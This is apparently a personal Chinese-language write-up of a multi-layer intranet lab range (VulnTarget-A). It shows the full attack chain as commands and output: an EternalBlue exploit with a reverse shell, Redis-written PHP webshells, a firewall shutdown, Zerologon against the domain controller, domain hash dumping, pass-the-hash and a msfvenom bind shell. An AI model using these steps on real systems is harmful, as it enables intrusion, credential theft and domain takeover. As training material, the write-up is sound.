打靶记录(一六五)之VulnTargetA

搭建

参考: https://www.cnblogs.com/backlion/p/16979674.html

外网打点

主机发现

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sn 192.168.127.0/24
[sudo] password for mikannse: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 13:11 HKT
Nmap scan report for 192.168.127.1
Host is up (0.00069s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.127.3
Host is up (0.00052s latency).
MAC Address: 00:0C:29:B3:DB:08 (VMware)
Nmap scan report for 192.168.127.254
Host is up (0.0023s latency).
MAC Address: 00:50:56:F1:28:E7 (VMware)
Nmap scan report for 192.168.127.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.09 seconds

靶机IP为192.168.127.3

端口扫描

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ sudo ./fscan_386 -h 192.168.127.3            
[sudo] password for mikannse: 

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.127.3   is alive
[*] Icmp alive hosts len is: 1
192.168.127.3:135 open
192.168.127.3:445 open
192.168.127.3:139 open
192.168.127.3:80 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo:
[*]192.168.127.3
   [->]win7-PC
   [->]10.0.20.98
   [->]192.168.127.3
[+] 192.168.127.3       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.127.3      code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.127.3      [通达OA] 
[+] http://192.168.127.3 tongda-user-session-disclosure 
已完成 4/4
[*] 扫描结束,耗时: 8.185780028s

MS17_010

发现是一个永恒之蓝，直接msf一把梭

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ msfconsole -q                         
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/do
                                             cs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authenticatio
                                             n. Only affects Windows Server 2008 R2, Windows 7, Win
                                             dows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. O
                                             nly affects Windows Server 2008 R2, Windows 7, Windows
                                              Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affect
                                             s Windows Server 2008 R2, Windows 7, Windows Embedded
                                             Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.233.6    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.127.3
rhosts => 192.168.127.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.127.4
lhost => 192.168.127.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.127.4:4444 
[*] 192.168.127.3:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.127.3:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.127.3:445     - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.127.3:445 - The target is vulnerable.
[*] 192.168.127.3:445 - Connecting to target for exploitation.
[+] 192.168.127.3:445 - Connection established for exploitation.
[+] 192.168.127.3:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.127.3:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.127.3:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.127.3:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.127.3:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.127.3:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.127.3:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.127.3:445 - Sending all but last fragment of exploit packet
[*] 192.168.127.3:445 - Starting non-paged pool grooming
[+] 192.168.127.3:445 - Sending SMBv2 buffers
[+] 192.168.127.3:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.127.3:445 - Sending final SMBv2 buffers.
[*] 192.168.127.3:445 - Sending last fragment of exploit packet!
[*] 192.168.127.3:445 - Receiving response from exploit packet
[+] 192.168.127.3:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.127.3:445 - Sending egg to corrupted connection.
[*] 192.168.127.3:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.127.3
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.127.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.127.4:4444 -> 192.168.127.3:49515) at 2024-11-20 13:19:51 +0800

meterpreter > sysinfo
Computer        : WIN7-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

上传一个fscan

meterpreter > upload fscan64.exe C:\\Windows\\Temp
[*] Uploading  : /home/mikannse/vulntarget/a/fscan64.exe -> C:\Windows\Temp\fscan64.exe
[*] Completed  : /home/mikannse/vulntarget/a/fscan64.exe -> C:\Windows\Temp\fscan64.exe

解决一下msf的shell中中文乱码的问题

meterpreter > shell
Process 1012 created.
Channel 3 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18

已是系统管理员权限

发现还有一张网卡

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter �������� 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c43b:d6b:2f4f:6b6d%13
   IPv4 Address. . . . . . . . . . . : 10.0.20.98
   Subnet Mask . . . . . . . . . . . : 255.255.255.0

那么对这个网段进行一个主机探测,发现还有一个.99

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set rhosts 10.0.20.1-254
rhosts => 10.0.20.1-254
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against WIN7-PC
[*] ARP Scanning 10.0.20.1-254
[+]     IP: 10.0.20.1 MAC 00:50:56:c0:00:03 (VMware, Inc.)
[+]     IP: 10.0.20.98 MAC 00:0c:29:b3:db:12 (VMware, Inc.)
[+]     IP: 10.0.20.99 MAC 00:0c:29:49:db:32 (VMware, Inc.)
[+]     IP: 10.0.20.254 MAC 00:50:56:ee:90:e7 (VMware, Inc.)
[*] Post module execution completed

尝试一下stowaway这个新工具进行代理，先开启服务端

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ ./linux_x64_admin -l 9999

上传一个客户端至靶机上连接回服务端

C:\Windows\Temp>windows_x64_agent.exe -c 192.168.127.4:9999
windows_x64_agent.exe -c 192.168.127.4:9999
2024/11/20 13:57:39 [*] Starting agent node actively.Connecting to 192.168.127.4:9999

在本地开启8888端口作为代理

[*] Waiting for new connection...
[*] Connection from node 192.168.127.3:50432 is set up successfully! Node id is 0
(admin) >> detail
Node[0] -> IP: 192.168.127.3:50432  Hostname: win7-PC  User: nt authority\system
Memo: 

(admin) >> use 0
(node 0) >> socks 8888
[*] Trying to listen on 0.0.0.0:8888......
[*] Waiting for agent's response......                                                               
[*] Socks start successfully!

proxychains中的配置文件更改之后，即可进行代理

横向移动

先进行一个端口扫描，由于这种套着代理的扫描不是很稳定，总之先后扫描出一个80一个6379

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains nmap --min-rate=10000 -p- 10.0.20.99 -Pn
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:08 HKT
Nmap scan report for 10.0.20.99
Host is up (0.00092s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
6379/tcp open  redis

Nmap done: 1 IP address (1 host up) scanned in 33.04 seconds

扫描一下网站的目录

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains gobuster dir -u http://10.0.20.99/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,bak
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.20.99/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 11]
/Index.php            (Status: 200) [Size: 11]
/l.php                (Status: 200) [Size: 14722]
/L.php                (Status: 200) [Size: 14722]

访问l.php，发现是一个php探针，得到网站的绝对路径是C:/phpStudy/PHPTutorial/WWW

redis未授权

并且发现redis是未授权的

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain  ...  127.0.0.1:8888  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> 

那么写入一个webshell

10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW"
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> set test "<?php system($_GET['cmd']); ?>"
OK

发现又是系统权限

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ proxychains curl 'http://10.0.20.99/shell.php?cmd=whoami' --output res
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0[proxychains] Dynamic chain  ...  127.0.0.1:8888  ...  10.0.20.99:80  ...  OK
100   108  100   108    0     0   2336      0 --:--:-- --:--:-- --:--:--  2347
                                                                                                     
┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ cat res 
REDIS0007�      redis-ver3.2.100�
redis-bits�@�ctime��=gused-mem���testnt authority\system
��㋅����

双层内网上线

用蚁剑连接,记得设置代理

10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/www/"
OK
10.0.20.99:6379> config set dbfilename shell1.php
OK
10.0.20.99:6379> set x "<?php @eval($_POST[0]);?>"
OK
10.0.20.99:6379> save
OK

蚁剑连接上线，但这里因为两层内网，不方便直接上线,这里试试看用CS

开启客户端和服务端之后，先将第一台上线，然后右键可以利用第一台作为跳板机进行转发上线

先关闭一下windows的防火墙，两台都要

netsh advfirewall set allprofiles state off

然后蚁剑上传,触发后成功上线,ipconfig一下发现还有一张10.0.10.111的网卡

上传fscan扫描,发现一台.110

[11/20 20:57:16] [*] Tasked beacon to run: fscan64.exe -h 10.0.10.0/24
[11/20 20:57:16] [+] host called home, sent: 58 bytes
[11/20 20:57:26] [+] received output:

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.10.111     is alive
(icmp) Target 10.0.10.110     is alive
[*] Icmp alive hosts len is: 2
10.0.10.111:80 open
10.0.10.111:6379 open
10.0.10.111:445 open
10.0.10.111:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.110:88 open
10.0.10.110:445 open
10.0.10.110:139 open
[*] alive ports len is: 9
start vulscan
[*] NetBios: 10.0.10.110     [+]DC VULNTARGET\WIN2019       
[*] NetInfo:
[*]10.0.10.111
   [->]win2016
   [->]10.0.20.99
   [->]10.0.10.111
[*] WebTitle: http://10.0.10.111        code:200 len:11     title:None
[+] Redis:10.0.10.111:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] NetInfo:
[*]10.0.10.110
   [->]win2019
   [->]10.0.10.110

发现开启了88端口，那么是一台DC

Zerologon

尝试zerologon的利用,利用: https://github.com/mstxq17/cve-2020-1472

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains python zerologon.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
=[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK

Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

直接dump数据库

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains secretsdump.py -just-dc -no-pass WIN2019\$@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:49673  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:0a5961f001aed3ef2370c4c6d6eb70e1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:eed6593fd08413533507715bcbcaee6b29da1bb281c114168ef92bada53c1b10
WIN2016$:aes128-cts-hmac-sha1-96:99ea46f36ffdc46f7abfb2c1e742d2c6
WIN2016$:des-cbc-md5:94cbc4dcce8f348c
[*] Cleaning up...

哈希传递,拿下管理员权限

┌──(mikannse㉿kali)-[~/tools/domain]
└─$ proxychains psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:445  ...  OK
[*] Requesting shares on 10.0.10.110.....
[*] Found writable share ADMIN$
[*] Uploading file OfQCvEnM.exe
[*] Opening SVCManager on 10.0.10.110.....
[*] Creating service gIAt on 10.0.10.110.....
[*] Starting service gIAt.....
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:445  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:445  ...  OK
[!] Press help for extra shell commands
[proxychains] Dynamic chain  ...  127.0.0.1:1090  ...  10.0.10.110:445  ...  OK
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.17763.107]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2018 Microsoft Corporation����������Ȩ����


C:\Windows\system32> whoami    
nt authority\system

分支:用MSF正向shell

尝试用msf的正向shell打一下

永恒之蓝打完后，可以手动添加第一台的另一张网卡路由

msf6 auxiliary(server/socks_proxy) > route add 10.0.20.0 255.255.255.0 1
[*] Route added
msf6 auxiliary(server/socks_proxy) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.20.0          255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.

然后use auxiliary/server/socks_proxy开启代理就行了

进行主机存活探测

msf6 auxiliary(server/socks_proxy) > use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set rhosts 10.0.20.1-254
rhosts => 10.0.20.1-254
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against WIN7-PC
[*] ARP Scanning 10.0.20.1-254
[+]     IP: 10.0.20.1 MAC 00:50:56:c0:00:03 (VMware, Inc.)
[+]     IP: 10.0.20.98 MAC 00:0c:29:b3:db:12 (VMware, Inc.)
[+]     IP: 10.0.20.99 MAC 00:0c:29:49:db:32 (VMware, Inc.)
[+]     IP: 10.0.20.254 MAC 00:50:56:ee:90:e7 (VMware, Inc.)
[*] Post module execution completed

可以用use auxiliary/scanner/portscan/tcp来进行端口扫描

生成正向shell，蚁剑上传

┌──(mikannse㉿kali)-[~/vulntarget/a]
└─$ msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=444 -f exe > shell.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes

然后set payload,rhosts,lport就能拿到正向shell

碎碎念

打的第一台vulntarget，还是花了不少时间的,多层内网的环境。还是CS好用